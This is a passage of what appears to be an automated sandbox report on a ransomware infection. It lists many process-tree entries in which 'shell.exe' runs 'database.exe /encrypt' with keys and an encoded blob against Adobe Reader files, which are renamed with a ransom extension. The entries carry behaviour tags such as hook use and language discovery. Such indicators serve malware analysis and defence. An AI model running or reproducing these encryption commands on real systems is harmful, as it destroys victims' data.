                                                                                                                                                                                                                                                                                "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\end_review.gif.id-DA208E5B.[[email protected]].gamma"
                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                PID:4408
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_distributed.gif.id-DA208E5B.[[email protected]].gamma"
                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                PID:4740
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_received.gif.id-DA208E5B.[[email protected]].gamma"
                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                PID:4164
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_super.gif.id-DA208E5B.[[email protected]].gamma"
                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                PID:5980
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\form_responses.gif.id-DA208E5B.[[email protected]].gamma"
                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                PID:3708
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\info.gif.id-DA208E5B.[[email protected]].gamma"
                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                PID:3132
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\main.css.id-DA208E5B.[[email protected]].gamma"
                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                PID:6364
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\open_original_form.gif.id-DA208E5B.[[email protected]].gamma"
                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                PID:6396
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\pdf.gif.id-DA208E5B.[[email protected]].gamma"
                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                PID:3684
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviewers.gif.id-DA208E5B.[[email protected]].gamma"
                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                PID:5388
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_joined.gif.id-DA208E5B.[[email protected]].gamma"
                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                PID:6016
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_sent.gif.id-DA208E5B.[[email protected]].gamma"
                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                PID:4768
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_super.gif.id-DA208E5B.[[email protected]].gamma"
                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                PID:4232
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_browser.gif.id-DA208E5B.[[email protected]].gamma"
                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                PID:6992
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_email.gif.id-DA208E5B.[[email protected]].gamma"
                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                PID:4588
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_same_reviewers.gif.id-DA208E5B.[[email protected]].gamma"
                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                PID:4676
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_shared.gif.id-DA208E5B.[[email protected]].gamma"
                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                PID:6580
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\rss.gif.id-DA208E5B.[[email protected]].gamma"
                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                PID:6420
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_issue.gif.id-DA208E5B.[[email protected]].gamma"
                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                PID:5776
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\shell.exe
